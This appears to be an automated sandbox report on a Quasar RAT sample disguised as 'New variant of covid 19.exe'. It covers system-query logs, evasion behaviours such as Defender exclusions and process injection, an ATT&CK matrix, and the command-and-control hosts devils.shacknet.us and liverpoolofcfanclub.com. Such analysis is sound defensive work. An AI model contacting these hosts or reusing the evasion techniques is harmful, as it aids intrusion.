      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exeQueries volume information: C:\Users\user\Desktop\New variant of covid 19.exe VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeQueries volume information: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe VolumeInformation
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeQueries volume information: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe VolumeInformation
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Lowering of HIPS / PFW / Operating System Security Settings:

      barindex
      Changes security center settings (notifications, updates, antivirus, firewall)Show sources
      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
      Source: svchost.exe, 0000001D.00000002.740199179.000001D409C3D000.00000004.00000001.sdmpBinary or memory string: $@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
      Source: svchost.exe, 0000001D.00000002.740420286.000001D409D02000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

      Stealing of Sensitive Information:

      barindex
      Yara detected Quasar RATShow sources
      Source: Yara matchFile source: 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: New variant of covid 19.exe PID: 7152, type: MEMORY
      Source: Yara matchFile source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPE
      Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents
      Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents\sfTrQxoCTFZPN
      Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents
      Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents\sfTrQxoCTFZPN
      Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents
      Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents\sfTrQxoCTFZPN
      Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents
      Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents\sfTrQxoCTFZPN

      Remote Access Functionality:

      barindex
      Yara detected Quasar RATShow sources
      Source: Yara matchFile source: 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: New variant of covid 19.exe PID: 7152, type: MEMORY
      Source: Yara matchFile source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPE

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools21OS Credential DumpingFile and Directory Discovery11Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobRegistry Run Keys / Startup Folder1Process Injection212Obfuscated Files or Information1LSASS MemorySystem Information Discovery22Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Registry Run Keys / Startup Folder1Timestomp1Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)DLL Side-Loading1NTDSSecurity Software Discovery151Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading111LSA SecretsVirtualization/Sandbox Evasion25SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol12Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion25Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection212DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Network Configuration Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 365752 Sample: New variant of covid 19.exe Startdate: 09/03/2021 Architecture: WINDOWS Score: 100 56 devils.shacknet.us 2->56 72 Multi AV Scanner detection for domain / URL 2->72 74 Malicious sample detected (through community Yara rule) 2->74 76 Yara detected Quasar RAT 2->76 78 9 other signatures 2->78 9 New variant of covid 19.exe 17 11 2->9         started        14 explorer.exe 2->14         started        16 explorer.exe 2->16         started        18 13 other processes 2->18 signatures3 process4 dnsIp5 66 liverpoolofcfanclub.com 104.21.31.39, 49710, 49720, 49727 CLOUDFLARENETUS United States 9->66 52 C:\Users\Public\Documents\...\svchost.exe, PE32 9->52 dropped 54 C:\Users\...\svchost.exe:Zone.Identifier, ASCII 9->54 dropped 92 Adds a directory exclusion to Windows Defender 9->92 94 Hides threads from debuggers 9->94 96 Injects a PE file into a foreign processes 9->96 20 New variant of covid 19.exe 2 9->20         started        24 cmd.exe 1 9->24         started        26 powershell.exe 26 9->26         started        28 WerFault.exe 9 9->28         started        30 svchost.exe 14->30         started        32 svchost.exe 16->32         started        68 127.0.0.1 unknown unknown 18->68 70 192.168.2.1 unknown unknown 18->70 98 Changes security center settings (notifications, updates, antivirus, firewall) 18->98 file6 signatures7 process8 dnsIp9 58 ip-api.com 208.95.112.1, 49715, 80 TUT-ASUS United States 20->58 60 devils.shacknet.us 103.28.70.164, 4782, 49717, 49718 HVC-ASUS United States 20->60 80 Hides that the sample has been downloaded from the Internet (zone.identifier) 20->80 34 conhost.exe 24->34         started        36 timeout.exe 1 24->36         started        38 conhost.exe 26->38         started        62 liverpoolofcfanclub.com 30->62 82 Adds a directory exclusion to Windows Defender 30->82 84 Tries to delay execution (extensive OutputDebugStringW loop) 30->84 86 Hides threads from debuggers 30->86 40 cmd.exe 30->40         started        42 powershell.exe 30->42         started        44 svchost.exe 30->44         started        64 liverpoolofcfanclub.com 32->64 88 System process connects to network (likely due to code injection or exploit) 32->88 90 Injects a PE file into a foreign processes 32->90 signatures10 process11 process12 46 conhost.exe 40->46         started        48 timeout.exe 40->48         started        50 conhost.exe 42->50         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      10.2.New variant of covid 19.exe.400000.0.unpack100%AviraHEUR/AGEN.1135947Download File

      Domains

      SourceDetectionScannerLabelLink
      liverpoolofcfanclub.com8%VirustotalBrowse
      devils.shacknet.us10%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%Avira URL Cloudsafe
      https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%Avira URL Cloudsafe
      https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%Avira URL Cloudsafe
      http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-62D0D2B15CF140C87AEA01E41DD7046D.html0%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%Avira URL Cloudsafe
      https://www.liverpool.com/all-about/premier-league0%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%Avira URL Cloudsafe
      https://www.liverpool.com/liverpool-fc-news/0%Avira URL Cloudsafe
      https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%Avira URL Cloudsafe
      https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%Avira URL Cloudsafe
      https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%Avira URL Cloudsafe
      http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
      http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
      http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%Avira URL Cloudsafe
      https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%Avira URL Cloudsafe
      https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%Avira URL Cloudsafe
      https://reachplc.hub.loginradius.com&quot;0%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png0%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-0%Avira URL Cloudsafe
      http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-75F90208612A44FA7B0856621DD5DF3A.html0%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.0%Avira URL Cloudsafe
      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-12737166900%Avira URL Cloudsafe
      https://s2-prod.liverpool.com0%Avira URL Cloudsafe
      https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-199458160%Avira URL Cloudsafe
      https://%s.xboxlive.com0%URL Reputationsafe
      https://%s.xboxlive.com0%URL Reputationsafe
      https://%s.xboxlive.com0%URL Reputationsafe
      https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-12313538370%Avira URL Cloudsafe
      https://i2-prod.liverpool.com0%Avira URL Cloudsafe
      https://felix.data.tm-awx.com/felix.min.js0%Avira URL Cloudsafe
      https://dynamic.t0%URL Reputationsafe
      https://dynamic.t0%URL Reputationsafe
